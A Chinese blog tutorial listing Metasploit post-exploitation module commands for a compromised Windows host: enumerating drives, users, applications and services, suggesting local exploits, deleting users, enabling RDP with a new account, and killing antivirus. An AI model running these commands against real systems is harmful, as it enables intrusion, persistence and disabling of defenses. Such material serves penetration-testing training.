大横幅1
大横幅2
到期时间:永久 到期时间:推广
小横幅3 小横幅4
  1. 当前位置:网站首页 > 技术教程

Metasploit -- 后渗透模块(POST)


作用:获取目标主机后shell后,继续信息收集,提权

1、获取目标分区情况

run post/windows/gather/forensics/enum_drives

2、检测是否是虚拟主机

run post/windows/gather/checkvm

3、获取当前安装的应用程序

run post/windows/gather/enum_applications

4、获取用户登录信息

run post/windows/gather/enum_logged_on_users

5、对目标进行漏洞扫描

run post/multi/recon/local_exploit_suggester

6、收集系统环境信息

run post/multi/gather/env

7、查看开启的服务

run post/windows/gather/enum_services

8、查看目标主机最近的操作

run post/windows/gather/dumplinks

9、其他操作

删除用户

run post/wndows/manage/delete_user username=aiyou

添加账户

run post/windows/manage/enable_rdp USERNAME=aiyou PASSWORD=aiyou

关闭杀软

windows/manage/killav


本文最后更新于2021-3-1,已超过 3个月没有更新,如果文章内容或图片资源失效,请留言反馈,我们会及时处理,谢谢!
获取更多资讯请加入交流群

    协助本站SEO优化一下,谢谢!
    关键词不能为空
版权说明

本文地址:http://kirinbk.cn/post-533.html
免责声明:本站文章仅用于科普及教育用途,远离犯罪!

发表评论

联系我们

在线咨询:点击这里给我发消息

QQ交流群:KirinBlog

工作日:8:00-23:00,节假日休息

扫码关注